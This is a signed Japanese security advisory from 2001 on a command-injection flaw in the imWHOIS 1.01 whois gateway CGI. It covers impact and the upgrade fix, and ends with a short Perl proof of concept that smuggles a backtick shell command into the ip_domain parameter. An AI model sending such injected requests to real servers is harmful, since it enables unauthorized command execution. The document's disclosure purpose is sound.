-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

======================================================================
CGI PROGRAM SECURITY ADVISORY  [Im Whois 1.01]              2001/01/28
======================================================================
http://www.ansi.co.jp/cgi/security/advisories/im-whois_2001_01_28.txt
======================================================================

■ 影響を受けるCGIプログラム

* IP調査 (imWHOIS) 1.01

■ 概要

IP調査 (imWHOIS) 1.01 は CGI 倶楽部によって作成された whois(1) に対す
るゲートウェイ CGI プログラムです。このプログラムでは与えられた入力に
対する汚染チェックを怠っているため、外部から CGI プログラムの動作権限
で任意のコマンドが実行可能であるセキュリティ上の問題点があります。

IP調査 (imWHOIS): http://www.cgi-club.com/imWHOIS/

■ 影響

CGIプログラムが各ユーザ権限で実行されるシステム (Apache + SuEXEC など)
の場合、そのユーザの権限で任意の操作をすることが可能です。これによって
ユーザ環境が破壊される可能性があります。そうではない場合でも、CGI プロ
グラムの実行 UID で任意の操作が可能です。

■ 回避方法

IP調査 (imWHOIS) 1.02 に差し換える。

■ 参考コード

#! /usr/bin/perl -w

use LWP::UserAgent;

$header = new HTTP::Headers(Referer => "http://host/");
$request = new HTTP::Request("GET", "http://host/whois101/cgi-bin/imwhois/im_whois.cgi?ip_domain=nic.ad.%60ls+-l+%3E+%2Ftmp%2Fls-lR%60jp&check=%92%B2%8D%B8&nic=jpnic", $header);
$ua = new LWP::UserAgent;
$ua->request($request);

__END__


■ 変更履歴

2001/01/28: 公開
2001/02/11: 参考コードを追加

======================================================================

(C) 2001 ASUKA NETWORK SERVICE, INC.  http://www.ansi.co.jp/
         HIRATA YASUYUKI              http://yasu.asuka.net/
All rights reserved.

* この文書に書かれている内容は無保証です
* この文書に書かれている内容を利用して攻撃を行った場合、刑事上・民事上
  の責任を問われることがあります。
* このファイルは内容の変更 (電子署名の除去を含む) が行われない限り自由
  に再配布可能です。

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7rqeAduP2KhBu8ikRAlFTAKCOgyEWVVDB2HZawzo7fV7z6LMa5ACgjE9t
JN0DWL50ZtcLgd1OZnx5nDSIPwMFATuup4DCitaZXxzdBBECUVMAn39dBlCYak6V
kafHkuPtTbS3s7ToAKDANleJHhDK1S1rcaV/7K+fXeZ05g==
=7mI8
-----END PGP SIGNATURE-----